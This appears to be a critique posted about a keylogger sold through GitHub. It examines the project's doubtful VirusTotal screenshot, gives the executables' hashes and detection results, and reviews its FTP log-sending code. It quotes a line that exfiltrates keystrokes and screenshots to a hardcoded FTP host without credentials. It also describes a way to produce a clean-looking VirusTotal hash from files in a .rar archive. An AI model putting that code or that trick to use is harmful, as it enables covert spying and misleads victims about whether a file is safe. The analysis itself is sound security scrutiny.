I’m always happy to find new open source software to learn something from its code, but there are some things that don’t add up with this one. Starting from the picture of the VirusTotal report you included in the GitHub repository:
- Having your files tagged as being published from a trusted developer takes quite an effort, VirusTotal needs to verify the file is actually benign and will take some time to do that so people can trust them when they say the file isn’t malicious and comes from someone with a good reputation, and I’m pretty sure they would notice this is a keylogger if they checked, I’ll explain why later. So this is a little suspicious already. “A little”.
- Why did you remove the file name from the report? The keylogger has two different executables, each with its own name, so it’s impossible to tell which one you have scanned from this screenshot, and why would you want to do that when advertising your 100% stealthy software? Don’t you think it’s a little bit fishy?
- Well damn, that’s a high community score, I wouldn’t expect more than a thousand people voting this file as benign, how odd.
- And finally, why didn’t you include the actual link to the scan instead of making a screenshot? I think I know why.
You have two different executables in the repository, one to capture keystrokes and another to send the logs over FTP (we’ll come to that later). The SHA-256 hash of the actual keylogger program is this:
53e57c196cc3c46937947309c9b0988e2c3a7ddb2d19be9cba9390ac6d65c069
While this is the hash of the other executable:
d975aec8184308df033b5fad5dfa2293d1a15814b31b1ebf671fabbd7c04841a
They are both different from the hash in the picture, and in fact, they give two completely different results from VirusTotal: logger (27/68), sender (26/68). The only way I managed to obtain the same hash you have in your picture with these executables is by dragging and dropping the files from the .rar archive straight into VirusTotal without extracting them inside another folder first, it’s quite curious really, but anyway, this is the scan I obtained with that method, and I include only one because both files returned the same exact hash, and the same file name, which seems to change every few scans, right now the file is called “293”, score 0/59, community score +812. Clicking on it again gave me a new name: “playview.apk”. In the Details tab you can actually see all the different names VirusTotal has collected for the same file, and I have to admit I was surprised when I saw “<PATH_SAMPLE>” in the list. We can conclude that the screenshot on GitHub isn’t accurate or trustworthy, because after a couple tests I discovered any file you extract from a .rar archive like that will give the same exact harmless looking hash, that’s why the result is 0/59, because you’re not actually scanning the original files. I still have to understand if this depends on the archive manager being used, I only tried with WinRAR because I’m lazy. But I think I just discovered a way to trick naive people with pictures of VirusTotal scans now.
So the keylogger isn’t really “100% invisible”, even Defender moved it in quarantine when I tried to download the archive from GitHub, I had to white list it in order to finish the download, and the same happened when I extracted the executables, flagging them as “Trojan:Win32/Tiggre!rfn”.
Finally, I haven’t tested the program because I don’t have a Windows VM at hand, but I did take a look at the code and I noticed a couple things with the two functions that send logs and images over FTP. Here’s an extract from the ftplogsend() function:
hFtpSession = InternetConnect(hInternet,"192.168.8.2",2121,NULL,NULL,INTERNET_SERVICE_FTP,0,0);
InternetSetOption(hInternet,INTERNET_OPTION_SEND_TIMEOUT,&rec_timeout,sizeof(rec_timeout));
You hardcoded an IP address and port to the program, so if I didn’t want to recompile everything from scratch I would have to change my subnet mask, since the default mask for home networks is 255.255.255.0 (and the provided address is Class C, so I can’t receive the logs unless I have my own server in the local network of my target), giving only 254 possible addresses, which do not include 192.168.8.2, and then I would also need to set up a static address for my FTP server.
Although the detail that caught my eye is another one: no credentials are needed to upload files on the FTP server: those two NULL parameters inside the call to InternetConnect() are supposed to be username and password to have access to the server, but requiring no credentials means virtually anyone can log in as anonymous and find the entire list of logs and pictures, download them, and even alter them as they please since it’s possible to overwrite files with a simple put command over FTP, or simply delete them with delete.
This is even worse when you remember that FTP alone provides no encryption whatsoever, everything travels in clear text: anyone in your network can fire up tcpdump or Wireshark and intercept your server’s IP address, port, and view every screenshot and log that is being sent. Also 2121 is an unusual port number, a local firewall could block those outbound packets quite easily if it was set properly.
So… this isn’t really all that secure isn’t it? I could see this as a little experimental project but you mentioned “1,000 screenshots included with purchase”, so you’re planning to sell it? I don’t know, there already are safe keyloggers out there, free ones too, I wouldn’t recommend anyone to buy this particular one if they were looking for a serious security-based program.
